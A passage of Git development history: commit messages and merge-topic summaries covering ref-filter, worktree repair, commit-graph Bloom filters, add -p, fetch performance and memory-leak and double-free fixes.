learned a few more tricks, e.g. the ":short" suffix that applies to
"objectname" now also can be used for "parent", "tree", etc.
* hv/ref-filter-misc:
ref-filter: add `sanitize` option for 'subject' atom
pretty: refactor `format_sanitized_subject()`
ref-filter: add `short` modifier to 'parent' atom
ref-filter: add `short` modifier to 'tree' atom
ref-filter: rename `objectname` related functions and fields
ref-filter: modify error messages in `grab_objectname()`
ref-filter: refactor `grab_objectname()`
ref-filter: support different email formats
Fixups to a topic in 'next'.
* ss/submodule-summary-in-c-fixes:
t7421: eliminate 'grep' check in t7421.4 for mingw compatibility
submodule: fix style in function definition
submodule: eliminate unused parameters from print_submodule_summary()
Internal API clean-up to handle two options "diff-index" and "log"
have, which happen to share the same short form, more sensibly.
* so/separate-field-for-m-and-diff-merges:
revision: add separate field for "-m" of "diff-index -m"
"git worktree" gained a "repair" subcommand to help users recover
after moving the worktrees or repository manually without telling
Git. Also, "git init --separate-git-dir" no longer corrupts
administrative data related to linked worktrees.
* es/worktree-repair:
init: make --separate-git-dir work from within linked worktree
init: teach --separate-git-dir to repair linked worktrees
worktree: teach "repair" to fix outgoing links to worktrees
worktree: teach "repair" to fix worktree back-links to main worktree
worktree: add skeleton "repair" command
When a packfile is removed by "git repack", multi-pack-index gets
cleared; the code was taught to do so less aggressively by first
checking if the midx actually refers to a pack that no longer
exists.
* tb/repack-clearing-midx:
midx: traverse the local MIDX first
builtin/repack.c: invalidate MIDX only when necessary
Yet another subcommand of "git submodule" is getting rewritten in C.
* ss/submodule-summary-in-c:
submodule: port submodule subcommand 'summary' from shell to C
t7421: introduce a test script for verifying 'summary' output
submodule: rename helper functions to avoid ambiguity
submodule: remove extra line feeds between callback struct and macro
When set in the environment, GIT_TRACE_REFS makes git print operations and
results as they flow through the ref storage backend. This helps debug
discrepancies between different ref backends.
Example:
$ GIT_TRACE_REFS="1" ./git branch
15:42:09.769631 refs/debug.c:26 ref_store for .git
15:42:09.769681 refs/debug.c:249 read_raw_ref: HEAD: 0000000000000000000000000000000000000000 (=> refs/heads/ref-debug) type 1: 0
15:42:09.769695 refs/debug.c:249 read_raw_ref: refs/heads/ref-debug: 3a238e539b (=> refs/heads/ref-debug) type 0: 0
15:42:09.770282 refs/debug.c:233 ref_iterator_begin: refs/heads/ (0x1)
15:42:09.770290 refs/debug.c:189 iterator_advance: refs/heads/b4 (0)
15:42:09.770295 refs/debug.c:189 iterator_advance: refs/heads/branch3 (0)
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Git uses the 'core.commitGraph' configuration value to control whether
or not the commit graph is used when parsing commits or performing a
traversal.
Now that commit-graphs can also contain a section for changed-path Bloom
filters, administrators that already have commit-graphs may find it
convenient to use those graphs without relying on their changed-path
Bloom filters. This can happen, for example, during a staged roll-out,
or in the event of an incident.
Introduce 'commitGraph.readChangedPaths' to control whether or not Bloom
filters are read. Note that this configuration is independent from both:
- 'core.commitGraph', to allow flexibility in using all parts of a
commit-graph _except_ for its Bloom filters.
- The '--changed-paths' option for 'git commit-graph write', to allow
reading and writing Bloom filters to be controlled independently.
When the variable is set, pretend as if no Bloom data was specified at
all. This avoids adding additional special-casing outside of the
commit-graph internals.
Suggested-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The read-graph test-tool is used by a number of the commit-graph test to
assert various properties about a commit-graph. Previously, this program
never ran 'prepare_repo_settings()'. There was no need to do so, since
none of the commit-graph machinery is affected by the repo settings.
In the next patch, the commit-graph machinery's behavior will become
dependent on the repo settings, and so loading them before running the
rest of the test tool is critical.
As such, teach the test tool to call 'prepare_repo_settings()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a future commit, some commit-graph internals will want access to
'r->settings', but we only have the 'struct object_directory *'
corresponding to that repository.
Add an additional parameter to pass the repository around in more
places.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a759bfa9ee (t4216: add end to end tests for git log with Bloom
filters, 2020-04-06), a 'rm' invocation was added without a
corresponding '&&' chain.
When 'trace.perf' already exists, everything works fine. However, the
function can be executed without 'trace.perf' on disk (eg., when the
subset of tests run is altered with '--run'), and so the bare 'rm'
complains about a missing file.
To remove some noise from the test log, invoke 'rm' with '-f', at which
point it is sensible to place the 'rm -f' in an '&&'-chain, which is
both (1) our usual style, and (2) avoids a broken chain in the future if
more commands are added at the beginning of the function.
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Many places in the code often need a pointer to the commit-graph's
'struct bloom_filter_settings', in which case they often take the value
from the top-most commit-graph.
In the non-split case, this works as expected. In the split case,
however, things get a little tricky. Not all layers in a chain of
incremental commit-graphs are required to themselves have Bloom data,
and so whether or not some part of the code uses Bloom filters depends
entirely on whether or not the top-most level of the commit-graph chain
has Bloom filters.
This has been the behavior since Bloom filters were introduced, and has
been codified into the tests since a759bfa9ee (t4216: add end to end
tests for git log with Bloom filters, 2020-04-06). In fact, t4216.130
requires that Bloom filters are not used in exactly the case described
earlier.
There is no reason that this needs to be the case, since it is perfectly
valid for commits in an earlier layer to have Bloom filters when commits
in a newer layer do not.
Since Bloom settings are guaranteed in practice to be the same for any
layer in a chain that has Bloom data, it is sufficient to traverse the
'->base_graph' pointer until either (1) a non-null 'struct
bloom_filter_settings *' is found, or (2) until we are at the root of
the commit-graph chain.
Introduce a 'get_bloom_filter_settings()' function that does just this,
and use it instead of purely dereferencing the top-most graph's
'->bloom_filter_settings' pointer.
While we're at it, add an additional test in t5324 to guard against code
in the commit-graph writing machinery that doesn't correctly handle a
NULL 'struct bloom_filter *'.
Co-authored-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A popular way of partially staging a new file is to run `git add -N
<path>` and then use the hunk editing of `git add -p` to select the
part of the file that the user wishes to stage. Since
85953a3187 ("diff-files --raw: show correct post-image of
intent-to-add files", 2020-07-01) this has stopped working as
intent-to-add paths are now show as new files rather than changes to
an empty blob and `git apply` refused to apply a creation patch for a
path that was marked as intent-to-add. 7cfde3fa0f ("apply: allow "new
file" patches on i-t-a entries", 2020-08-06) fixed the problem with
apply but it still wasn't possible to edit the added hunk properly.
2c8bd8471a ("checkout -p: handle new files correctly", 2020-05-27)
had previously changed `add -p` to handle new files but it did not
implement patch editing correctly. The perl version simply forbade
editing and the C version opened the editor with the full diff rather
that just the hunk which meant that the user had to edit the hunk
header manually to get it to work.
The root cause of the problem is that added files store the diff header
with the hunk data rather than separating the two as we do for other
changes. Changing added files to store the diff header separately
fixes the editing problem at the expense of having to special case
empty additions as they no longer have any hunks associated with them,
only the diff header.
The changes move some existing code into a conditional changing the
indentation, they are best viewed with
--color-moved-ws=allow-indentation-change (or --ignore-space-change
works well to get an overview of the changes)
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Reported-by: Thomas Sullivan <tom@msbit.com.au>
Reported-by: Yuchen Ying <ych@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Running `git config --worktree` outside of a git repository hits a BUG()
when trying to enumerate the worktrees. Let's catch this error earlier
and die() with a friendlier message.
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The maintainer's dist rules are used to produce distribution
tarballs. They use "$(TAR) cf" and "$(TAR) rf" to produce archives
out of a freshly created local installation area, which means that
the built product can be affected by maintainer's umask and other
local environment.
Implementations of "tar" have ways (implementation specific,
unfortunately) to force permission bits and other stuff to allow the
user to hide these effects coming from the local environment. Teach
our Makefile to allow the maintainer to tweak the invocation of the
$(TAR) commands by setting TAR_DIST_EXTRA_OPTS.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
0906ac2b (blame: use changed-path Bloom filters, 2020-04-16)
introduced a call to oidcmp() that should have been oideq(), which
was introduced in 14438c44 (introduce hasheq() and oideq(),
2018-08-28).
Signed-off-by: Edmundo Carmona Antoranz <eantoranz@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, when index-pack resolves deltas, it does not split up delta
trees into threads: each delta base root (an object that is not a
REF_DELTA or OFS_DELTA) can go into its own thread, but all deltas on
that root (direct or indirect) are processed in the same thread.
This is a problem when a repository contains a large text file (thus,
delta-able) that is modified many times - delta resolution time during
fetching is dominated by processing the deltas corresponding to that
text file.
This patch contains a solution to that. When cloning using
git -c core.deltabasecachelimit=1g clone \
https://fuchsia.googlesource.com/third_party/vulkan-cts
on my laptop, clone time improved from 3m2s to 2m5s (using 3 threads,
which is the default).
The solution is to have a global work stack. This stack contains delta
bases (objects, whether appearing directly in the packfile or generated
by delta resolution, that themselves have delta children) that need to
be processed; whenever a thread needs work, it peeks at the top of the
stack and processes its next unprocessed child. If a thread finds the
stack empty, it will look for more delta base roots to push on the stack
instead.
The main weakness of having a global work stack is that more time is
spent in the mutex, but profiling has shown that most time is spent in
the resolution of the deltas themselves, so this shouldn't be an issue
in practice. In any case, experimentation (as described in the clone
command above) shows that this patch is a net improvement.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
REF_LOG_ONLY is used in the transaction preparation: if a symref is involved in
a transaction, the referent of the symref should be updated, and the symref
itself should only be updated in the reflog.
Other ref backends will need to duplicate this logic too, so move it to a
central place.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "refuse --edit-description on unborn branch for now" test in t3200
switches to an orphan branch, causing subsequent git commands
referencing HEAD to fail. Avoid this side-effect by switching back to
master after the test finishes.
This has gone undetected, as the next affected test expects failure -
but it currently fails for the wrong reason.
Verbose output of the next test referencing HEAD,
"--merged is incompatible with --no-merged":
fatal: malformed object name HEAD
Which this commit corrects to:
error: option `no-merged' is incompatible with --merged
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When formatting a patch series over `origin..HEAD`, one would expect
that range to be used as the current-series-range when computing a
range-diff between the previous and current versions of a patch series.
However, infer_range_diff_ranges() ignores `origin..HEAD` when
--range-diff=<prev> specifies a single revision rather than a range, and
instead unexpectedly computes the current-series-range based upon
<prev>. Address this anomaly by unconditionally using `origin..HEAD` as
the current-series-range regardless of <prev> as long as `origin` is
known, and only fall back to basing current-series-range on <prev> when
`origin` is not known.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To compute and show an interdiff, show_interdiff() needs only the two
OID's to compare and a diffopts, yet it expects callers to supply an
entire rev_info. The demand for rev_info is not only overkill, but also
places unnecessary burden on potential future callers which might not
otherwise have a rev_info at hand. Address this by tightening its
signature to require only the items it needs instead of a full rev_info.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
show_interdiff() is a relatively small function and not likely to grow
larger or more complicated. Rather than dedicating an entire source file
to it, relocate it to diff-lib.c which houses other "take two things and
compare them" functions meant to be re-used but not so low-level as to
reside in the core diff implementation.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have had parallel implementations of "add -i/-p" since 2.25 and
have been using them from various codepaths since 2.26 days, but
never made the built-in version the default.
We have found and fixed a handful of corner case bugs in the
built-in version, and it may be a good time to start switching over
the user base from the scripted version to the built-in version.
Let's enable the built-in version for those who opt into the
feature.experimental guinea-pig program to give wider exposure.
Acked-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
asan reports that the C version of `add -p` is not freeing all the
memory it allocates. Fix this by introducing a function to clear
`struct add_p_state` and use it instead of freeing individual members.
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Acked-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our color tests of "git add -p" do something a bit different from how a
normal user would behave: we pretend there's a pager in use, so that Git
thinks it's OK to write color to a non-tty stdout. This comes from
8539b46534 (t3701: avoid depending on the TTY prerequisite, 2019-12-06),
which allows us to avoid a lot of complicated mock-tty code.
However, those environment variables also make their way down to
sub-processes of add--interactive, including the "diff-files" we run to
generate the patches. As a result, it thinks it should output color,
too. So in t3701.50, for example, the machine-readable version of the
diff we get unexpectedly has color in it. We fail to parse it as a diff
and think there are zero hunks.
The test does still pass, though, because even with zero hunks we'll
dump the diff header (and we consider those unparseable bits to be part
of the header!), and so the output still has the expected color codes in
it. We don't notice that the command was totally broken and failed to
apply anything.
And in fact we're not really testing what we think we are about the
color, either. While add--interactive does correctly show the version we
got from running "diff-files --color", we'd also pass the test if we had
accidentally shown the machine-readable version, too, since it
(erroneously) has color codes in it.
One could argue that the test isn't very realistic; it's setting up this
"pretend there's a pager" situation to get around the tty restrictions
of the test environment. So one option would be to move back towards
using a real tty. But the behavior of add--interactive really is
user-visible here. If a user, for whatever reason, did run "git
--paginate add --patch" (perhaps because their pager is really a filter
or something), the command would totally fail to do anything useful.
Since we know that we don't want color in this output, let's just make
add--interactive more defensive, and say "--no-color" explicitly. It
doesn't hurt anything in the common case, but it fixes this odd case and
lets our test function properly again.
Note that the C builtin run_add_p() already passes --no-color, so it
doesn't need a similar fix. That will eventually replace this perl code
anyway, but the test change here will be valuable for ensuring that.
Signed-off-by: Jeff King <peff@peff.net>
Acked-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After applying hunks to a file with "add -p", the C patch_update_file()
function tries to refresh the index (just like the perl version does).
We can only refresh the index if we're able to read it in, so we first
check the return value of repo_read_index(). But unlike many functions,
where "0" is success, that function is documented to return the number
of entries in the index. Hence we should be checking for success with a
non-negative return value.
Neither the tests nor any users seem to have noticed this, probably due
to a combination of:
- this affects only the C version, which is not yet the default
- following it up with any porcelain command like "git diff" or "git
commit" would refresh the index automatically.
But you can see the problem by running the plumbing "git diff-files"
immediately after "add -p" stages all hunks. Running the new test with
GIT_TEST_ADD_I_USE_BUILTIN=1 fails without the matching code change.
Signed-off-by: Jeff King <peff@peff.net>
Acked-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
By default, `git worktree add` creates a new worktree associated with a
particular branch (which may have been created automatically if not
specified explicitly on the command-line). It is also convenient to
create throwaway worktrees not associated with any branch, which can be
handy when making experimental changes or doing testing. However, the
latter use-case may not be obvious to newcomers since the high-level
description of worktrees talks only about checking out "more than one
branch at a time". Therefore, enhance the description to to discuss both
use-cases.
A secondary goal of highlighting the distinction between branch-based
and throwaway worktrees is to help newcomers understand that the
simplest form `git worktree add <path>` automatically creates a new
branch. Stating this early in the description, may help newcomers avoid
creating branches without realizing they are doing so, and later
wondering why `git branch --list` shows branches the user did not
intentionally create.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Like `git switch` and `git checkout`, `git worktree add` can check out a
branch or set up a detached HEAD. However, unlike those other commands,
`git worktree add` does not understand -d as shorthand for --detach,
which may confound users accustomed to using -d for this purpose.
Address this shortcoming by teaching `add` to recognize -d for --detach,
thus bringing it in line with the other commands.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`git checkout` learned -d as short option for --detach in 163e3b2975
(switch: add short option for --detach, 2019-03-29) but the
documentation was never updated to reflect the change.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The argv argument of collect_changed_submodules() contains only object ids
(the objects references of all the refs).
Notify setup_revisions() that the input is not filenames by passing
assume_dashdash, so it can avoid redundant stat for each ref.
Also suppress refname_ambiguity flag to avoid filesystem lookups for
each object. Similar logic can be found in cat-file, pack-objects and more.
This change reduces the time for git fetch in my repo from 25s to 6s.
Signed-off-by: Orgad Shaneh <orgads@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Call hashwrite_be32() instead of open-coding it. This is shorter and
easier to read.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Emit byte-sized values using hashwrite_u8() instead of buffering them
locally first. The hashwrite functions already do their own buffering,
so this double-buffering does not reduce the number of system calls.
Getting rid of it shortens and simplifies the code a bit.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Call write_pack_header() to hash and write a pack header instead of
open-coding this function. This gets rid of duplicate code and of the
magic version number 2 -- which has been used here since c90be46abd
(Changed fast-import's pack header creation to use pack.h, 2006-08-16)
and in pack.h (again) since 29f049a0c2 (Revert "move pack creation to
version 3", 2006-10-14).
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a function for building a refspec using printf-style formatting. It
frees callers from managing their own buffer. Use it throughout the
tree to shorten and simplify its callers.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
map_refspec() either returns the passed in ref string or a detached
strbuf. This makes it hard for callers to release the possibly
allocated memory, and set_refspecs() consequently leaks it.
Let map_refspec() append any refspecs directly and release its own
strbufs after use. Rename it to refspec_append_mapped() and don't
return anything to reflect its increased responsibility.
set_refspecs() also leaks its strbufs. Do the same here and directly
call refspec_append() in each if branch instead of holding onto a
detached strbuf, then dispose of the allocated memory after use. We
need to add an else branch for the final call because all the other
conditional branches already add their formatted refspec now.
setup_push_upstream() and setup_push_current() forgot to release their
strbufs as well; plug these leaks, too, while at it.
None of these leaks were likely to impact users, because the number
and sizes of refspecs are usually small and the allocations are only
done once per program run. Clean them up nevertheless, as another
step on the long road towards zero memory leaks.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
44c7e1a7e0 (mem-pool: use more standard initialization and finalization,
2020-08-15) moved the allocation of the mem-pool structure to callers.
It also added an allocation to load_cache_entries_threaded(), but for an
unrelated mem-pool. Fix that by allocating the correct one instead --
the one that is initialized two lines later.
Reported-by: Sandor Bodo-Merle <sbodomerle@gmail.com>
Signed-off-by: René Scharfe <l.s.r@web.de>
Reviewed-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Tools based on LibClang [1] can make use of a 'JSON Compilation
Database' [2] that keeps track of the exact options used to compile a set
of source files.
For example, clangd [3], which is a C language server protocol
implementation, can use a JSON compilation database to determine the
flags needed to compile a file so it can provide proper editor
integration. As a result, editors supporting the language server
protocol (such as VS Code, Emacs, or Vim, with suitable plugins) can
provide better searching, integration, and refactoring tools.
The Clang compiler can generate JSON fragments when compiling [4],
using the `-MJ` flag. These JSON fragments (one per compiled source
file) can then be concatenated to create the compilation database,
commonly called 'compile_commands.json'.
Add support to the Makefile for generating these JSON fragments as well
as the compilation database itself, if the environment variable
'GENERATE_COMPILATION_DATABASE' is set.
If this variable is set, check that $(CC) indeed supports the `-MJ`
flag, following what is done for automatic dependencies.
All JSON fragments are placed in the 'compile_commands/' directory, and
the compilation database 'compile_commands.json' is generated as a
dependency of the 'all' target using a `sed` invocation.
[1] https://clang.llvm.org/docs/Tooling.html
[2] https://clang.llvm.org/docs/JSONCompilationDatabase.html
[3] https://clangd.llvm.org/
[4] https://clang.llvm.org/docs/ClangCommandLineReference.html#cmdoption-clang-mj-arg
Helped-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Get rid of needless check of 'parents' for NULL. The NULL case
is already handled right above, and 'parents' is dereferenced
without check below anyway.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Handle first_parent_only by breaking from generic loop early
rather than by duplicating (part of) the loop body.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When fetching recursively with submodules, for each ref in the
superproject, we call check_for_new_submodule_commits() which collects all
the objects that have to be checked for submodule changes on
calculate_changed_submodule_paths(). On the first call, it also collects all
the existing refs for excluding them from the scan.
calculate_changed_submodule_paths() creates an argument array with all the
collected new objects, followed by --not and all the old objects. This argv
is passed to setup_revisions, which parses each argument, converts it back
to an oid and resolves the object. The parsing itself also does redundant
work, because it is treated like user input, while in fact it is a full
oid. So it needlessly attempts to look it up as ref (checks if it has ^, ~
etc.), checks if it is a file name etc.
For a repository with many refs, all of this is expensive. But if the fetch
in the superproject did not update the ref (i.e. the objects that are
required to exist in the submodule did not change), there is no need to
include it in the list.
Before commit be76c212 (fetch: ensure submodule objects fetched,
2018-12-06), submodule reference changes were only detected for refs that
were changed, but not for new refs. This commit covered also this case, but
what it did was to just include every ref.
This change should reduce the number of scanned refs by about half (except
the case of a no-op fetch, which will not scan any ref), because all the
existing refs will still be listed after --not.
The regression was reported here:
https://public-inbox.org/git/CAGHpTBKSUJzFSWc=uznSu2zB33qCSmKXM-
iAjxRCpqNK5bnhRg@mail.gmail.com/
Signed-off-by: Orgad Shaneh <orgads@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It was possible for xrealloc() to send a non-NULL pointer that has
been freed, which has been fixed.
* jk/xrealloc-avoid-use-after-free:
xrealloc: do not reuse pointer freed by zero-length realloc()
"git diff --stat -w" showed 0-line changes for paths whose changes
were only whitespaces, which was not intuitive. We now omit such
paths from the stat output.
* mr/diff-hide-stat-wo-textual-change:
diff: teach --stat to ignore uninteresting modifications
Updates to on-demand fetching code in lazily cloned repositories.
* jt/lazy-fetch:
fetch: no FETCH_HEAD display if --no-write-fetch-head
fetch-pack: remove no_dependents code
promisor-remote: lazy-fetch objects in subprocess
fetch-pack: do not lazy-fetch during ref iteration
fetch: only populate existing_refs if needed
fetch: avoid reading submodule config until needed
fetch: allow refspecs specified through stdin
negotiator/noop: add noop fetch negotiator
A handful of places in in-tree code still relied on being able to
execute the git subcommands, especially built-ins, in "git-foo"
form, which have been corrected.
* jc/undash-in-tree-git-callers:
credential-cache: use child_process.args
cvsexportcommit: do not run git programs in dashed form
transport-helper: do not run git-remote-ext etc. in dashed form
Trim an unused binary and turn a bunch of commands into built-in.
* jk/slimmed-down:
drop vcs-svn experiment
make git-fast-import a builtin
make git-bugreport a builtin
make credential helpers builtins
Makefile: drop builtins from MSVC pdb list
Bugfix for "git fetch" when the packfile URI capability is in use.
* jt/fetch-pack-loosen-validation-with-packfile-uri:
fetch-pack: make packfile URIs work with transfer.fsckobjects
fetch-pack: document only_packfile in get_pack()
(various): document from_promisor parameter
Test clean-up.
* ss/t7401-modernize:
t7401: add a NEEDSWORK
t7401: change indentation for enhanced readability
t7401: change syntax of test_i18ncmp calls for clarity
t7401: use 'short' instead of 'verify' and cut in rev-parse calls
t7401: modernize style
"git rebase -i" learns a bit more options.
* pw/rebase-i-more-options:
t3436: do not run git-merge-recursive in dashed form
rebase: add --reset-author-date
rebase -i: support --ignore-date
rebase -i: support --committer-date-is-author-date
am: stop exporting GIT_COMMITTER_DATE
rebase -i: add --ignore-whitespace flag
When a user checks out the upstream branch of HEAD, the upstream branch
not being a local branch, and then runs "git status", like this:
git clone $URL client
cd client
git checkout @{u}
git status
no status is printed, but instead an error message:
fatal: HEAD does not point to a branch
(This error message when running "git branch" persists even after
checking out other things - it only stops after checking out a branch.)
This is because "git status" reads the reflog when determining the "HEAD
detached" message, and thus attempts to DWIM "@{u}", but that doesn't
work because HEAD no longer points to a branch.
Therefore, when calculating the status of a worktree, tolerate dangling
marks. This is done by adding an additional parameter to
dwim_ref() and repo_dwim_ref().
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This makes it clear that dwim_ref() is just repo_dwim_ref() without the
first parameter.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for a future patch adding a boolean parameter to
repo_interpret_branch_name(), which might be easily confused with an
existing unsigned int parameter, refactor repo_interpret_branch_name()
to take an option struct instead of the unsigned int parameter.
The static function interpret_branch_mark() is also updated to take the
option struct in preparation for that future patch, since it will also
make use of the to-be-introduced boolean parameter.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
887952b8c6 ("fetch: optionally allow disabling FETCH_HEAD update",
2020-08-18) introduced the ability to disable writing to FETCH_HEAD
during fetch, but did not suppress the "<source> -> FETCH_HEAD" message
when this ability is used. This message is misleading in this case,
because FETCH_HEAD is not written. Also, because "fetch" is used to
lazy-fetch missing objects in a partial clone, this significantly
clutters up the output in that case since the objects to be fetched are
potentially numerous.
Therefore, suppress this message when --no-write-fetch-head is passed
(but not when --dry-run is set).
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the common case where users have _not_ pushed a `ci-config` branch to
configure which branches should be included in the GitHub workflow runs,
there is a big fat ugly annotation about a failure in the run's log:
X Check failure on line 1 in .github
@github-actions github-actions / ci-config
.github#L1
Process completed with exit code 128.
The reason is that the `ci-config` job tries to clone that `ci-config`
branch, and even if it is configured to continue on error, the
annotation is displayed, and it is distracting.
Let's just handle this on the shell script level, so that the job's step
is not marked as a failure.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Acked-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The section added in e76eec3554 (ci: allow per-branch config for
GitHub Actions, 2020-05-07) contains a `&&`-chain that connects several
commands. The first command is actually so long that it stretches over
multiple lines, and as per usual, the continuation lines are indented one
more level than the first.
However, the subsequent commands in the `&&`-chain were also indented
one more level than the first command, which was almost certainly
unintended.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Acked-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This patch fixes a bug where xrealloc(ptr, 0) can double-free and
corrupt the heap on some platforms (including at least glibc).
The C99 standard says of malloc (section 7.20.3):
If the size of the space requested is zero, the behavior is
implementation-defined: either a null pointer is returned, or the
behavior is as if the size were some nonzero value, except that the
returned pointer shall not be used to access an object.
So we might get NULL back, or we might get an actual pointer (but we're
not allowed to look at its contents). To simplify our code, our
xmalloc() handles a NULL return by converting it into a single-byte
allocation. That way callers get consistent behavior. This was done way
back in 4e7a2eccc2 (?alloc: do not return NULL when asked for zero
bytes, 2005-12-29).
We also gave xcalloc() and xrealloc() the same treatment. And according
to C99, that is fine; the text above is in a paragraph that applies to
all three. But what happens to the memory we passed to realloc() in such
a case? I.e., if we do:
ret = realloc(ptr, 0);
and "ptr" is non-NULL, but we get NULL back, is "ptr" still valid? C99
doesn't cover this case specifically, but says (section 7.20.3.4):
The realloc function deallocates the old object pointed to by ptr and
returns a pointer to a new object that has the size specified by size.
So "ptr" is now deallocated, and we must only look at "ret". And since
"ret" is NULL, that means we have no allocated object at all. But that's
not quite the whole story. It also says:
If memory for the new object cannot be allocated, the old object is
not deallocated and its value is unchanged.
[...]
The realloc function returns a pointer to the new object (which may
have the same value as a pointer to the old object), or a null pointer
if the new object could not be allocated.
So if we see a NULL return with a non-zero size, we can expect that the
original object _is_ still valid. But with a non-zero size, it's
ambiguous. The NULL return might mean a failure (in which case the
object is valid), or it might mean that we successfully allocated
nothing, and used NULL to represent that.
The glibc manpage for realloc() explicitly says:
[...]if size is equal to zero, and ptr is not NULL, then the call is
equivalent to free(ptr).
Likewise, this StackOverflow answer:
https://stackoverflow.com/a/2135302
claims that C89 gave similar guidance (but I don't have a copy to verify
it). A comment on this answer:
https://stackoverflow.com/a/2022410
claims that Microsoft's CRT behaves the same.
But our current "retry with 1 byte" code passes the original pointer
again. So on glibc, we effectively free() the pointer and then try to
realloc() it again, which is undefined behavior.
The simplest fix here is to just pass "ret" (which we know to be NULL)
to the follow-up realloc(). But that means that a system which _doesn't_
free the original pointer would leak it. It's not clear if any such
systems exist, and that interpretation of the standard seems unlikely
(I'd expect a system that doesn't deallocate to simply return the
original pointer in this case). But it's easy enough to err on the safe
side, and just never pass a zero size to realloc() at all.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In fde97d8ac6 (Update documentation to remove incorrect GIT_DIFF_OPTS
example., 2006-11-27), the description of the 'GIT_EXTERNAL_DIFF'
variable was moved from 'diff-format.txt' to 'git.txt', and the
documentation was updated to remove a 'diff(1)' invocation since Git did
not use an external diff program anymore by default.
However, the description of 'GIT_EXTERNAL_DIFF' still mentions "instead
of the diff invocation described above", which is confusing.
Correct that outdated sentence.
Also, link to git(1) in 'diff-generate-patch.txt' when GIT_DIFF_OPTS and
GIT_EXTERNAL_DIFF are mentioned, so that users can easily know what
these variables are about.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Feeding "$ZERO_OID" to "git log --ignore-missing --stdin", and
running "git log --ignore-missing $ZERO_OID" fell back to start
digging from HEAD; it has been corrected to become a no-op, like
"git log --tags=no-tag-matches-this-pattern" does.
* jk/rev-input-given-fix:
revision: set rev_input_given in handle_revision_arg()
The description of --cached/--index options in "git apply --help"
has been updated.
